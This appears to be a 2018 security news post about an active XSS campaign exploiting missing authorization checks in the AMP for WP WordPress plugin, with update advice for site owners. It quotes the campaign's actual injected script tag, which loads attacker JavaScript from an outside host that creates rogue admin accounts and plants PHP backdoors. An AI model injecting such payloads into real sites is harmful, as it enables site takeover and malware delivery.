AMP for WP Plugin
News | 11/21/2018

Active XSS injection campaigns attack WP WordPress Plug-in

About: Vulnerabilities recently discovered in a high profile AMP (Accelerated Mobile Pages) for WP (WordPress) plugin enables any registered user to perform administrative actions on a Wordpress site. Since there is no user role validation, threat ac...  Read More  

| News | Active XSS injection campaigns attack WP WordPress Plug-in

WordPress (WP) is by far the most popular open source Content management system (CMS) used by approximately 75 million websites. The ease to deploy and upgrade this free tool makes it popular among web- savvy users and web- novices alike. Whether it’ a commercial site or a personal blog, the fact that WordPress doesn’t charge a penny makes it a preferable tool among people.

 

 

AMP for WP plugin

The compatibility and flexibility of Word Press to host thousands of plugins and templates gives it an edge over its contemporaries. However, the popularity of this tool among users has made this popular tool a lucrative target among threat actors.

 

Recent research reveals that vulnerability in a high profile WordPress plugin that is installed on more than 100,000 sites has come under active exploitation.  The vulnerability discovered in the popular AMP (Accelerated Mobile Pages) for WP plugin allows any registered user to perform administrative actions on a WordPress site.

What is AMP for WP plugin?

The compatibility of a website may vary on mobile platform. For instance, the speed of loading a website, the view of the website and many other features may differ in mobile devices. This may have an impact on web traffic and affect site’s ranking as well.

AMP for WP plugin

 

 

AMP plugins for WordPress were designed to enable seamless website usability from any mobile viewing device. These plugins ensure that the viewers take full advantage of the website’s features when using mobile viewing device.

 

Insights of XSS Injection Campaign

Older versions of AMP plugin for WordPress are prone to security vulnerabilities that make it a lucrative target for XSS attack (cross-site scripting attack).  An active XSS campaign targets these vulnerabilities to create rogue admin accounts on a vulnerable WordPress site.

 

In WordPress plugin development, you have the provision to register ajax hooks. Ajax is a technology that lets you update content on a webpage without having to reload it in the browser. This means, you can fetch data from the database and display it on the front-end without needing to refresh the page.

AMP for WP plugin

The main issue with this approach is that every registered user can call ajax hooks. If the called hook doesn’t perform the authorization check, every user can make a use of those functions and inject the following XSS payload into vulnerable sites:

 

<script src=https://sslapis.com/assets/si/stat.js></script>

 

This malicious script when executed in administrator’s browser affects the website in the following ways:

 

  1. Simulates the process of filling out the New User form to create new rogue admin users on the site.
  2. This rogue admin account is configured with the username supportuuser and with the email supportuser72019@gmail.com.AMP for WP plugin
  3. Apart from creating a new rogue administrator account, the script also attempts to inject backdoor code into affected site’s plugins.
  4. These backdoors enables attackers to execute arbitrary PHP code on infected sites and inject their ads, mining scripts or javascript malware.

 

In the updated version, the plugin performs an authorization check that allows only admin users to update plugin settings.

 

It is therefore recommended that site owners using AMP for WP plugin update to the most recent version (0.9.97.20) of this plugin as soon as possible.

Hits: 164

Leave a Reply

Your email address will not be published. Required fields are marked *

Did you find the article informative? Yes NO

Get Regular Updates Related to All the Threats

Want to stay informed about the latest threats & malware? Sign up for our newsletter & learn how to get rid of all types of threats from your computer.

Virus Removal Guidelines
Plot No 319, Nandpuri- B Pratap Nagar
Jaipur
Rajasthan 302033
Phone: +91 9799661866